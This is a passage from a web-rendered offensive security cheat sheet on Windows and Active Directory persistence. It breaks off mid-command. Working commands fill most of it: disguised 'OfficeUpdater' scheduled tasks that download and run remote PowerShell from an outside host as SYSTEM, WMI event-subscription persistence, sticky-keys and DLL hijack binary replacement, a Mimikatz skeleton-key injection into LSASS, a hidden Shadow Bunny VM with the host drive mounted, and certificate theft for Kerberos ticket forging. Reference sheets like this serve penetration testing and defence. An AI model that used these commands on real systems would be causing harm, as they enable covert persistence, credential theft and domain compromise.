<a id="__codelineno-29-20" name="__codelineno-29-20" href="#__codelineno-29-20"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterB</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onstart</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-21" name="__codelineno-29-21" href="#__codelineno-29-21"></a>
<a id="__codelineno-29-22" name="__codelineno-29-22" href="#__codelineno-29-22"></a><span class="c">##(X86) - On User Idle (30mins)</span>
<a id="__codelineno-29-23" name="__codelineno-29-23" href="#__codelineno-29-23"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterC</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onidle</span> <span class="p">/</span><span class="n">i</span> <span class="n">30</span>
<a id="__codelineno-29-24" name="__codelineno-29-24" href="#__codelineno-29-24"></a>
<a id="__codelineno-29-25" name="__codelineno-29-25" href="#__codelineno-29-25"></a><span class="c">##(X64) - On User Login</span>
<a id="__codelineno-29-26" name="__codelineno-29-26" href="#__codelineno-29-26"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterA</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onlogon</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-27" name="__codelineno-29-27" href="#__codelineno-29-27"></a>
<a id="__codelineno-29-28" name="__codelineno-29-28" href="#__codelineno-29-28"></a><span class="c">##(X64) - On System Start</span>
<a id="__codelineno-29-29" name="__codelineno-29-29" href="#__codelineno-29-29"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterB</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onstart</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-30" name="__codelineno-29-30" href="#__codelineno-29-30"></a>
<a id="__codelineno-29-31" name="__codelineno-29-31" href="#__codelineno-29-31"></a><span class="c">##(X64) - On User Idle (30mins)</span>
<a id="__codelineno-29-32" name="__codelineno-29-32" href="#__codelineno-29-32"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterC</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onidle</span> <span class="p">/</span><span class="n">i</span> <span class="n">30</span>
</code></pre></div>
<h3 id="windows-management-instrumentation-event-subscription">Windows Management Instrumentation Event Subscription</h3>
<blockquote>
<p>An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.</p>
</blockquote>
<ul>
<li><strong>__EventFilter</strong>: Trigger (new process, failed logon etc.)</li>
<li><strong>__EventConsumer</strong> (e.g. <code>CommandLineEventConsumer</code>): Perform Action (execute payload etc.)</li>
<li><strong>__FilterToConsumerBinding</strong>: Binds Filter and Consumer Classes</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="c"># Using CMD : Execute a binary 60 seconds after Windows started</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">__EventFilter</span> <span class="n">CREATE</span> <span class="n">Name</span><span class="p">=</span><span class="s2">&quot;WMIPersist&quot;</span><span class="p">,</span> <span class="n">EventNameSpace</span><span class="p">=</span><span class="s2">&quot;root\cimv2&quot;</span><span class="p">,</span><span class="n">QueryLanguage</span><span class="p">=</span><span class="s2">&quot;WQL&quot;</span><span class="p">,</span> <span class="n">Query</span><span class="p">=</span><span class="s2">&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;&quot;</span>
<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">CommandLineEventConsumer</span> <span class="n">CREATE</span> <span class="n">Name</span><span class="p">=</span><span class="s2">&quot;WMIPersist&quot;</span><span class="p">,</span> <span class="n">ExecutablePath</span><span class="p">=</span><span class="s2">&quot;C:\Windows\System32\binary.exe&quot;</span><span class="p">,</span><span class="n">CommandLineTemplate</span><span class="p">=</span><span class="s2">&quot;C:\Windows\System32\binary.exe&quot;</span>
<a id="__codelineno-30-4" name="__codelineno-30-4" href="#__codelineno-30-4"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">__FilterToConsumerBinding</span> <span class="n">CREATE</span> <span class="k">Filter</span><span class="p">=</span><span class="s2">&quot;__EventFilter.Name=\&quot;</span><span class="n">WMIPersist</span><span class="p">\</span><span class="s2">&quot;&quot;</span><span class="p">,</span> <span class="n">Consumer</span><span class="p">=</span><span class="s2">&quot;CommandLineEventConsumer.Name=\&quot;</span><span class="n">WMIPersist</span><span class="p">\</span><span class="s2">&quot;&quot;</span>
<a id="__codelineno-30-5" name="__codelineno-30-5" href="#__codelineno-30-5"></a><span class="c"># Remove it</span>
<a id="__codelineno-30-6" name="__codelineno-30-6" href="#__codelineno-30-6"></a><span class="nb">Get-WMIObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">\</span><span class="n">Subscription</span> <span class="n">-Class</span> <span class="n">__EventFilter</span> <span class="n">-Filter</span> <span class="s2">&quot;Name=&#39;WMIPersist&#39;&quot;</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span> <span class="n">-Verbose</span>
<a id="__codelineno-30-7" name="__codelineno-30-7" href="#__codelineno-30-7"></a>
<a id="__codelineno-30-8" name="__codelineno-30-8" href="#__codelineno-30-8"></a><span class="c"># Using Powershell (deploy)</span>
<a id="__codelineno-30-9" name="__codelineno-30-9" href="#__codelineno-30-9"></a><span class="nv">$FilterArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="n">name</span><span class="p">=</span><span class="s1">&#39;WMIPersist&#39;</span><span class="p">;</span> <span class="n">EventNameSpace</span><span class="p">=</span><span class="s1">&#39;root\CimV2&#39;</span><span class="p">;</span> <span class="n">QueryLanguage</span><span class="p">=</span><span class="s2">&quot;WQL&quot;</span><span class="p">;</span> <span class="n">Query</span><span class="p">=</span><span class="s2">&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39; AND TargetInstance.SystemUpTime &gt;= 60 AND TargetInstance.SystemUpTime &lt; 90&quot;</span><span class="p">};</span>
<a id="__codelineno-30-10" name="__codelineno-30-10" href="#__codelineno-30-10"></a><span class="nv">$Filter</span><span class="p">=</span><span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">__EventFilter</span> <span class="n">-Property</span> <span class="nv">$FilterArgs</span>
<a id="__codelineno-30-11" name="__codelineno-30-11" href="#__codelineno-30-11"></a><span class="nv">$ConsumerArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="n">name</span><span class="p">=</span><span class="s1">&#39;WMIPersist&#39;</span><span class="p">;</span> <span class="n">CommandLineTemplate</span><span class="p">=</span><span class="s2">&quot;</span><span class="p">$(</span><span class="nv">$Env:SystemRoot</span><span class="p">)</span><span class="s2">\System32\binary.exe&quot;</span><span class="p">;}</span>
<a id="__codelineno-30-12" name="__codelineno-30-12" href="#__codelineno-30-12"></a><span class="nv">$Consumer</span><span class="p">=</span><span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">CommandLineEventConsumer</span> <span class="n">-Property</span> <span class="nv">$ConsumerArgs</span>
<a id="__codelineno-30-13" name="__codelineno-30-13" href="#__codelineno-30-13"></a><span class="nv">$FilterToConsumerArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="k">Filter</span> <span class="p">=</span> <span class="no">[Ref]</span> <span class="nv">$Filter</span><span class="p">;</span> <span class="n">Consumer</span> <span class="p">=</span> <span class="no">[Ref]</span> <span class="nv">$Consumer</span><span class="p">;}</span>
<a id="__codelineno-30-14" name="__codelineno-30-14" href="#__codelineno-30-14"></a><span class="nv">$FilterToConsumerBinding</span> <span class="p">=</span> <span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">__FilterToConsumerBinding</span> <span class="n">-Property</span> <span class="nv">$FilterToConsumerArgs</span>
<a id="__codelineno-30-15" name="__codelineno-30-15" href="#__codelineno-30-15"></a><span class="c"># Using Powershell (remove)</span>
<a id="__codelineno-30-16" name="__codelineno-30-16" href="#__codelineno-30-16"></a><span class="nv">$EventConsumerToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Class</span> <span class="n">CommandLineEventConsumer</span> <span class="n">-Filter</span> <span class="s2">&quot;Name = &#39;WMIPersist&#39;&quot;</span>
<a id="__codelineno-30-17" name="__codelineno-30-17" href="#__codelineno-30-17"></a><span class="nv">$EventFilterToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Class</span> <span class="n">__EventFilter</span> <span class="n">-Filter</span> <span class="s2">&quot;Name = &#39;WMIPersist&#39;&quot;</span>
<a id="__codelineno-30-18" name="__codelineno-30-18" href="#__codelineno-30-18"></a><span class="nv">$FilterConsumerBindingToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Query</span> <span class="s2">&quot;REFERENCES OF {</span><span class="p">$(</span><span class="nv">$EventConsumerToCleanup</span><span class="p">.</span><span class="n">__RELPATH</span><span class="p">)</span><span class="s2">} WHERE ResultClass = __FilterToConsumerBinding&quot;</span>
<a id="__codelineno-30-19" name="__codelineno-30-19" href="#__codelineno-30-19"></a><span class="nv">$FilterConsumerBindingToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
<a id="__codelineno-30-20" name="__codelineno-30-20" href="#__codelineno-30-20"></a><span class="nv">$EventConsumerToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
<a id="__codelineno-30-21" name="__codelineno-30-21" href="#__codelineno-30-21"></a><span class="nv">$EventFilterToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
</code></pre></div>
<h3 id="binary-replacement">Binary Replacement</h3>
<h4 id="binary-replacement-on-windows-xp">Binary Replacement on Windows XP+</h4>
<table>
<thead>
<tr>
<th>Feature</th>
<th>Executable</th>
</tr>
</thead>
<tbody>
<tr>
<td>Sticky Keys</td>
<td>C:\Windows\System32\sethc.exe</td>
</tr>
<tr>
<td>Accessibility Menu</td>
<td>C:\Windows\System32\utilman.exe</td>
</tr>
<tr>
<td>On-Screen Keyboard</td>
<td>C:\Windows\System32\osk.exe</td>
</tr>
<tr>
<td>Magnifier</td>
<td>C:\Windows\System32\Magnify.exe</td>
</tr>
<tr>
<td>Narrator</td>
<td>C:\Windows\System32\Narrator.exe</td>
</tr>
<tr>
<td>Display Switcher</td>
<td>C:\Windows\System32\DisplaySwitch.exe</td>
</tr>
<tr>
<td>App Switcher</td>
<td>C:\Windows\System32\AtBroker.exe</td>
</tr>
</tbody>
</table>
<p>In Metasploit: <code>use post/windows/manage/sticky_keys</code></p>
<h4 id="binary-replacement-on-windows-10">Binary Replacement on Windows 10+</h4>
<p>Exploit a DLL hijacking vulnerability in the On-Screen Keyboard <strong>osk.exe</strong> executable.</p>
<p>Create a malicious <strong>HID.dll</strong> in <code>C:\Program Files\Common Files\microsoft shared\ink\HID.dll</code>.</p>
<h3 id="skeleton-key">Skeleton Key</h3>
<blockquote>
<p>Inject a master password into the LSASS process of a Domain Controller.</p>
</blockquote>
<p>Requirements:</p>
<ul>
<li>Domain Administrator (SeDebugPrivilege) or <code>NTAUTHORITY\SYSTEM</code></li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="c"># Execute the skeleton key attack</span>
<a id="__codelineno-31-2" name="__codelineno-31-2" href="#__codelineno-31-2"></a><span class="n">mimikatz</span> <span class="s2">&quot;privilege::debug&quot;</span> <span class="s2">&quot;misc::skeleton&quot;</span>
<a id="__codelineno-31-3" name="__codelineno-31-3" href="#__codelineno-31-3"></a><span class="nb">Invoke-Mimikatz</span> <span class="n">-Command</span> <span class="s1">&#39;&quot;privilege::debug&quot; &quot;misc::skeleton&quot;&#39;</span> <span class="n">-ComputerName</span> <span class="p">&lt;</span><span class="n">DCs</span> <span class="n">FQDN</span><span class="p">&gt;</span>
<a id="__codelineno-31-4" name="__codelineno-31-4" href="#__codelineno-31-4"></a>
<a id="__codelineno-31-5" name="__codelineno-31-5" href="#__codelineno-31-5"></a><span class="c"># Access using the password &quot;mimikatz&quot;</span>
<a id="__codelineno-31-6" name="__codelineno-31-6" href="#__codelineno-31-6"></a><span class="nb">Enter-PSSession</span> <span class="n">-ComputerName</span> <span class="p">&lt;</span><span class="n">AnyMachineYouLike</span><span class="p">&gt;</span> <span class="n">-Credential</span> <span class="p">&lt;</span><span class="n">Domain</span><span class="p">&gt;\</span><span class="n">Administrator</span>
</code></pre></div>
<h3 id="virtual-machines">Virtual Machines</h3>
<blockquote>
<p>Based on the Shadow Bunny technique.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="c"># download virtualbox</span>
<a id="__codelineno-32-2" name="__codelineno-32-2" href="#__codelineno-32-2"></a><span class="nb">Invoke-WebRequest</span> <span class="s2">&quot;https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe&quot;</span> <span class="n">-OutFile</span> <span class="nv">$env:TEMP</span><span class="p">\</span><span class="n">VirtualBox</span><span class="p">-</span><span class="n">6</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">8</span><span class="p">-</span><span class="n">137981-Win</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-32-3" name="__codelineno-32-3" href="#__codelineno-32-3"></a>
<a id="__codelineno-32-4" name="__codelineno-32-4" href="#__codelineno-32-4"></a><span class="c"># perform a silent install and avoid creating desktop and quick launch icons</span>
<a id="__codelineno-32-5" name="__codelineno-32-5" href="#__codelineno-32-5"></a><span class="n">VirtualBox</span><span class="p">-</span><span class="n">6</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">14</span><span class="p">-</span><span class="n">133895-Win</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-silent</span> <span class="p">-</span><span class="n">-ignore-reboot</span> <span class="p">-</span><span class="n">-msiparams</span> <span class="n">VBOX_INSTALLDESKTOPSHORTCUT</span><span class="p">=</span><span class="n">0</span><span class="p">,</span><span class="n">VBOX_INSTALLQUICKLAUNCHSHORTCUT</span><span class="p">=</span><span class="n">0</span>
<a id="__codelineno-32-6" name="__codelineno-32-6" href="#__codelineno-32-6"></a>
<a id="__codelineno-32-7" name="__codelineno-32-7" href="#__codelineno-32-7"></a><span class="c"># in \Program Files\Oracle\VirtualBox\VBoxManage.exe</span>
<a id="__codelineno-32-8" name="__codelineno-32-8" href="#__codelineno-32-8"></a><span class="c"># Disabling notifications</span>
<a id="__codelineno-32-9" name="__codelineno-32-9" href="#__codelineno-32-9"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">setextradata</span> <span class="n">global</span> <span class="n">GUI</span><span class="p">/</span><span class="n">SuppressMessages</span> <span class="s2">&quot;all&quot;</span>
<a id="__codelineno-32-10" name="__codelineno-32-10" href="#__codelineno-32-10"></a>
<a id="__codelineno-32-11" name="__codelineno-32-11" href="#__codelineno-32-11"></a><span class="c"># Download the Virtual machine disk</span>
<a id="__codelineno-32-12" name="__codelineno-32-12" href="#__codelineno-32-12"></a><span class="nb">Copy-Item</span> <span class="p">\\</span><span class="n">smbserver</span><span class="p">\</span><span class="n">images</span><span class="p">\</span><span class="n">shadowbunny</span><span class="p">.</span><span class="n">vhd</span> <span class="nv">$env:USERPROFILE</span><span class="p">\</span><span class="n">VirtualBox</span><span class="p">\</span><span class="n">IT</span> <span class="n">Recovery</span><span class="p">\</span><span class="n">shadowbunny</span><span class="p">.</span><span class="n">vhd</span>
<a id="__codelineno-32-13" name="__codelineno-32-13" href="#__codelineno-32-13"></a>
<a id="__codelineno-32-14" name="__codelineno-32-14" href="#__codelineno-32-14"></a><span class="c"># Create a new VM</span>
<a id="__codelineno-32-15" name="__codelineno-32-15" href="#__codelineno-32-15"></a><span class="nv">$vmname</span> <span class="p">=</span> <span class="s2">&quot;IT Recovery&quot;</span>
<a id="__codelineno-32-16" name="__codelineno-32-16" href="#__codelineno-32-16"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">createvm</span> <span class="p">-</span><span class="n">-name</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-ostype</span> <span class="s2">&quot;Ubuntu&quot;</span> <span class="p">-</span><span class="n">-register</span>
<a id="__codelineno-32-17" name="__codelineno-32-17" href="#__codelineno-32-17"></a>
<a id="__codelineno-32-18" name="__codelineno-32-18" href="#__codelineno-32-18"></a><span class="c"># Add a network card in NAT mode</span>
<a id="__codelineno-32-19" name="__codelineno-32-19" href="#__codelineno-32-19"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-ioapic</span> <span class="n">on</span> <span class="c"># required for 64bit</span>
<a id="__codelineno-32-20" name="__codelineno-32-20" href="#__codelineno-32-20"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-memory</span> <span class="n">1024</span> <span class="p">-</span><span class="n">-vram</span> <span class="n">128</span>
<a id="__codelineno-32-21" name="__codelineno-32-21" href="#__codelineno-32-21"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-nic1</span> <span class="n">nat</span>
<a id="__codelineno-32-22" name="__codelineno-32-22" href="#__codelineno-32-22"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-audio</span> <span class="n">none</span>
<a id="__codelineno-32-23" name="__codelineno-32-23" href="#__codelineno-32-23"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-graphicscontroller</span> <span class="n">vmsvga</span>
<a id="__codelineno-32-24" name="__codelineno-32-24" href="#__codelineno-32-24"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-description</span> <span class="s2">&quot;Shadowbunny&quot;</span>
<a id="__codelineno-32-25" name="__codelineno-32-25" href="#__codelineno-32-25"></a>
<a id="__codelineno-32-26" name="__codelineno-32-26" href="#__codelineno-32-26"></a><span class="c"># Mount the VHD file</span>
<a id="__codelineno-32-27" name="__codelineno-32-27" href="#__codelineno-32-27"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">storagectl</span> <span class="nv">$vmname</span> <span class="n">-name</span> <span class="s2">&quot;SATA Controller&quot;</span> <span class="n">-add</span> <span class="n">sata</span>
<a id="__codelineno-32-28" name="__codelineno-32-28" href="#__codelineno-32-28"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">storageattach</span> <span class="nv">$vmname</span> <span class="n">-comment</span> <span class="s2">&quot;Shadowbunny Disk&quot;</span> <span class="n">-storagectl</span> <span class="s2">&quot;SATA Controller&quot;</span> <span class="n">-type</span> <span class="n">hdd</span> <span class="n">-medium</span> <span class="s2">&quot;$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd&quot;</span> <span class="n">-port</span> <span class="n">0</span>
<a id="__codelineno-32-29" name="__codelineno-32-29" href="#__codelineno-32-29"></a>
<a id="__codelineno-32-30" name="__codelineno-32-30" href="#__codelineno-32-30"></a><span class="c"># Start the VM</span>
<a id="__codelineno-32-31" name="__codelineno-32-31" href="#__codelineno-32-31"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">startvm</span> <span class="nv">$vmname</span> <span class="err"></span><span class="nb">type </span><span class="n">headless</span>
<a id="__codelineno-32-32" name="__codelineno-32-32" href="#__codelineno-32-32"></a>
<a id="__codelineno-32-33" name="__codelineno-32-33" href="#__codelineno-32-33"></a>
<a id="__codelineno-32-34" name="__codelineno-32-34" href="#__codelineno-32-34"></a><span class="c"># optional - adding a shared folder</span>
<a id="__codelineno-32-35" name="__codelineno-32-35" href="#__codelineno-32-35"></a><span class="c"># require: VirtualBox Guest Additions</span>
<a id="__codelineno-32-36" name="__codelineno-32-36" href="#__codelineno-32-36"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">sharedfolder</span> <span class="n">add</span> <span class="nv">$vmname</span> <span class="n">-name</span> <span class="n">shadow_c</span> <span class="n">-hostpath</span> <span class="n">c</span><span class="p">:\</span> <span class="n">-automount</span>
<a id="__codelineno-32-37" name="__codelineno-32-37" href="#__codelineno-32-37"></a><span class="c"># then mount the folder in the VM</span>
<a id="__codelineno-32-38" name="__codelineno-32-38" href="#__codelineno-32-38"></a><span class="n">sudo</span> <span class="n">mkdir</span> <span class="p">/</span><span class="n">mnt</span><span class="p">/</span><span class="n">c</span>
<a id="__codelineno-32-39" name="__codelineno-32-39" href="#__codelineno-32-39"></a><span class="n">sudo</span> <span class="nb">mount </span><span class="n">-t</span> <span class="n">vboxsf</span> <span class="n">shadow_c</span> <span class="p">/</span><span class="n">mnt</span><span class="p">/</span><span class="n">c</span>
</code></pre></div>
<h3 id="windows-subsystem-for-linux">Windows Subsystem for Linux</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="c"># List and install online packages</span>
<a id="__codelineno-33-2" name="__codelineno-33-2" href="#__codelineno-33-2"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-list</span> <span class="p">-</span><span class="n">-online</span>
<a id="__codelineno-33-3" name="__codelineno-33-3" href="#__codelineno-33-3"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-install</span> <span class="n">-d</span> <span class="n">kali-linux</span>
<a id="__codelineno-33-4" name="__codelineno-33-4" href="#__codelineno-33-4"></a>
<a id="__codelineno-33-5" name="__codelineno-33-5" href="#__codelineno-33-5"></a><span class="c"># Use a local package</span>
<a id="__codelineno-33-6" name="__codelineno-33-6" href="#__codelineno-33-6"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-set-default-version</span> <span class="n">2</span>
<a id="__codelineno-33-7" name="__codelineno-33-7" href="#__codelineno-33-7"></a><span class="n">curl</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-insecure</span> <span class="n">-L</span> <span class="n">-o</span> <span class="n">debian</span><span class="p">.</span><span class="n">appx</span> <span class="n">https</span><span class="p">://</span><span class="n">aka</span><span class="p">.</span><span class="n">ms</span><span class="p">/</span><span class="n">wsl-debian-gnulinux</span>
<a id="__codelineno-33-8" name="__codelineno-33-8" href="#__codelineno-33-8"></a><span class="nb">Add-AppxPackage</span> <span class="p">.\</span><span class="n">debian</span><span class="p">.</span><span class="n">appx</span>
<a id="__codelineno-33-9" name="__codelineno-33-9" href="#__codelineno-33-9"></a>
<a id="__codelineno-33-10" name="__codelineno-33-10" href="#__codelineno-33-10"></a><span class="c"># Run the machine as root</span>
<a id="__codelineno-33-11" name="__codelineno-33-11" href="#__codelineno-33-11"></a><span class="n">wsl</span> <span class="n">kali-linux</span> <span class="p">-</span><span class="n">-user</span> <span class="n">root</span>
</code></pre></div>
<h2 id="domain">Domain</h2>
<h3 id="user-certificate">User Certificate</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="c"># Request a certificate for the User template</span>
<a id="__codelineno-34-2" name="__codelineno-34-2" href="#__codelineno-34-2"></a><span class="p">.\</span><span class="n">Certify</span><span class="p">.</span><span class="n">exe</span> <span class="n">request</span> <span class="p">/</span><span class="n">ca</span><span class="p">:</span><span class="n">CA01</span><span class="p">.</span><span class="n">megacorp</span><span class="p">.</span><span class="n">local</span><span class="p">\</span><span class="n">CA01</span> <span class="p">/</span><span class="n">template</span><span class="p">:</span><span class="n">User</span>
<a id="__codelineno-34-3" name="__codelineno-34-3" href="#__codelineno-34-3"></a>
<a id="__codelineno-34-4" name="__codelineno-34-4" href="#__codelineno-34-4"></a><span class="c"># Convert the certificate for Rubeus</span>
<a id="__codelineno-34-5" name="__codelineno-34-5" href="#__codelineno-34-5"></a><span class="n">openssl</span> <span class="n">pkcs12</span> <span class="n">-in</span> <span class="n">cert</span><span class="p">.</span><span class="n">pem</span> <span class="n">-keyex</span> <span class="n">-CSP</span> <span class="s2">&quot;Microsoft Enhanced Cryptographic Provider v1.0&quot;</span> <span class="n">-export</span> <span class="n">-out</span> <span class="n">cert</span><span class="p">.</span><span class="n">pfx</span>
<a id="__codelineno-34-6" name="__codelineno-34-6" href="#__codelineno-34-6"></a>
<a id="__codelineno-34-7" name="__codelineno-34-7" href="#__codelineno-34-7"></a><span class="c"># Request a TGT using the certificate</span>
<a id="__codelineno-34-8" name="__codelineno-34-8" href="#__codelineno-34-8"></a><span class="p">.\</span><span class="n">Rubeus</span><span class="p">.</span><span class="n">exe</span> <span class="n">asktgt</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">username</span> <span class="p">/</span><span class="n">certificate</span><span class="p">:</span><span class="n">C</span><span class="p">:\</span><span class="n">Temp</span><span class="p">\</span><span class="n">cert</span><span class="p">.</span><span class="n">pfx</span> <span class="p">/</span><span class="n">password</span><span class="p">:</span><span class="n">Passw0rd123</span><span class="p">!</span>
</code></pre></div>
<h3 id="golden-certificate">Golden Certificate</h3>
<blockquote>
<p>Requires elevated privileges in Active Directory, or on the ADCS machine</p>
</blockquote>
<ul>
<li>Export the CA as a p12 file: <code>certsrv.msc</code> &gt; <code>Right Click</code> &gt; <code>Back up CA...</code></li>
<li>Alternative 1: Using Mimikatz, you can extract the certificate as PFX/DER
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="n">privilege</span><span class="p">::</span><span class="n">debug</span>
